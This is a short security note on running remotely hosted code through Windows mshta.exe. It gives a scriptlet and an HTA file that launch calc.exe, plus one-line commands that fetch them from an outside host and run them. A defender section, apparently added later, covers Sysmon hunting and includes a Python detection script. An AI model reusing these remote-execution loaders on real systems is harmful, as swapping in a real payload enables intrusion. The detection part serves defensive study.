Writing a scriptlet file that will launch calc.exe when invoked:
http://10.0.0.5/m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">
</registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>
Invoking the scriptlet file hosted remotely:
# from powershell
cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();
As expected, calc.exe is spawned by mshta.exe. Note that mshta.exe and cmd.exe exit almost immediately after launching calc.exe.
As a defender, look at Sysmon logs for mshta.exe establishing network connections.
Also look for suspicious command lines.
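The defender checks above as an added example (not from the original page): a small Python triage over Sysmon-style event dicts that flags mshta.exe network connections (event ID 3), mshta.exe command lines carrying script handlers or URLs, and processes whose parent is mshta.exe (event ID 1). The sample events are constructed; the field names follow Sysmon's event schema, and the rule names are assumptions of this example.

```python
import re

PROC_CREATE, NET_CONNECT = 1, 3  # Sysmon event IDs

# Command-line traits of the invocations shown on this page: inline script
# handlers, the "script:" moniker, or a remote URL passed to mshta.
SUSPICIOUS_ARGS = re.compile(r"javascript:|vbscript:|script:|https?://", re.I)

def is_mshta(path):
    """True if the executable path's file name is mshta.exe (any directory)."""
    return (path or "").replace("/", "\\").rsplit("\\", 1)[-1].lower() == "mshta.exe"

def triage(events):
    """Return (index, rule, detail) for each finding in a list of event dicts."""
    findings = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == NET_CONNECT and is_mshta(ev.get("Image")):
            dest = "%s:%s" % (ev.get("DestinationIp"), ev.get("DestinationPort"))
            findings.append((i, "network", dest))
        if eid == PROC_CREATE and is_mshta(ev.get("Image")):
            m = SUSPICIOUS_ARGS.search(ev.get("CommandLine", ""))
            if m:
                findings.append((i, "cmdline", m.group(0).lower()))
        if eid == PROC_CREATE and is_mshta(ev.get("ParentImage")):
            findings.append((i, "child", ev.get("Image")))
    return findings

# Constructed sample events; the last one is a benign local .hta launch.
SAMPLE = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": "calc.exe", "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\App\help.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Because mshta.exe and cmd.exe exit almost immediately, these checks have to run over recorded events rather than a live process listing.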
The hta file can be invoked like so:
mshta.exe http://10.0.0.5/m.hta
or by navigating to the file itself, launching it and clicking run:
http://10.0.0.5/m.hta
<html>
<head>
<script language="VBScript">
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
    RunProgram()
</script>
</head>
<body>
    Nothing to see here..
</body>
</html>